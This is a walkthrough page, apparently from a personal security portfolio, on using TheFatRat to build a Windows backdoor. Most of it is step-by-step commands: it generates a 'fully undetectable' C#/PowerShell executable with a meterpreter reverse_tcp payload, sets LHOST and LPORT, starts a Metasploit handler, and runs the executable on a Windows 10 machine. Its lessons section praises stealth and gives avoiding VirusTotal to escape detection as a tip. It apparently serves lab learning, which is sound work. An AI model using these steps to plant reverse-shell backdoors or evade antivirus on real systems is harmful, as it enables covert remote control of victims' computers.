top of page

Fat-Rat Github payload generator walkthrough

Introduction:

Welcome to my project, an exploration into the capabilities and implications of the FatRat Github payload generator. As a security enthusiast and practitioner, I've embarked on this journey to delve deeper into the realm of cybersecurity tools, understanding their functionalities, and dissecting their potential applications. Join me as I navigate through the process of leveraging FatRat for creating backdoors and exploring the nuances of payload generation.

This is a paragraph where you can add any information you want to share with website visitors. Click here to edit the text, change the font and make it your own.

Steps

Fatrat.png

1.    Github clone https://github.com/screetsec/TheFatRat
2.    Cd TheFatRat
3.    Chmod +x setup.sh && setup.sh/
4.    Sudo su root
5.    Run fatrat (this will start the tool)

image.png

6.    It will warn us not to upload to virus total (so we will not)


7.    We will create a backdoor with option 6

 


8.    We will use option 2 create exe file C# and Powershell this is FUD (fully undetectable)

 


9.    Set LHOST [HOST IP]

 

 


10.    SET LPORT 5555

image.png

11. Enter the basename of out put file I named mine ratbackdoor


12.We then use option 3 windows/meterpreter/reverse_tcp


13. Backdoor is then created and is in /root/Fatrat_Generated/ratbackdoor.exe


14.This tool doesn't open a listener so we may have to open a second or go back to main menu and use option 10

image.png

15.    Open another terminal cd /root/Fatrat_Generated

 


16.    Cp ratbackdoor.exe /home/kali/Desktop

image.png

17.    Then copy exe  to windows 10 device


18.    We will then use command use  exploit/multi/handler/


19.    Set payload windows/meterpreter/reverse_tcp


20.    Set LHOST 10.0.1.67


21.    Set LPORT 5555


22.    Run


23.    Then click on our backdoor in windows 10 machine.

 Lessons Learned

  1. Tool Familiarization: The initial step was to clone the FatRat repository from Github and navigate to its directory. This acquainted me with the structure of the tool and its setup process.

  2. Execution Permissions: Understanding the importance of proper permissions, I ensured that the setup script was executable using the chmod command before running it.

  3. Root Privileges: As certain functionalities of FatRat require elevated privileges, I transitioned to root using sudo su root to execute the tool seamlessly.

  4. Payload Generation: The core functionality of FatRat lies in its ability to generate various types of payloads. By selecting options within the tool, I learned to create backdoors tailored to specific scenarios.

  5. Undetectable Payloads: Exploring the options provided by FatRat, I discovered techniques to generate Fully Undetectable (FUD) payloads using C# and Powershell scripts, enhancing the stealth and effectiveness of the backdoors.

  6. Payload Customization: Through setting parameters such as LHOST and LPORT, I gained insights into customizing payloads to suit different network configurations and operational requirements.

  7. Listener Management: Recognizing the need to manage listeners for incoming connections, I became adept at initiating listeners either within the tool or separately using commands.

  8. Deployment Strategies: After generating the backdoor executable, I experimented with different deployment strategies, including transferring the payload to target machines and initiating connections from the attacker's end.

  9. Operational Considerations: The process highlighted the importance of operational considerations such as managing multiple terminals, file transfers, and ensuring seamless communication between attacker and target systems.

  10. Security Awareness: Finally, the experience underscored the significance of security awareness, including cautionary measures such as refraining from uploading payloads to public repositories like VirusTotal to avoid detection.

​

In conclusion, my journey through the FatRat payload generator not only enhanced my technical skills but also deepened my understanding of cybersecurity methodologies and the intricate dance between attackers and defenders in the digital landscape. Through this project, I aim to share my insights and contribute to the collective knowledge of the cybersecurity community.

bottom of page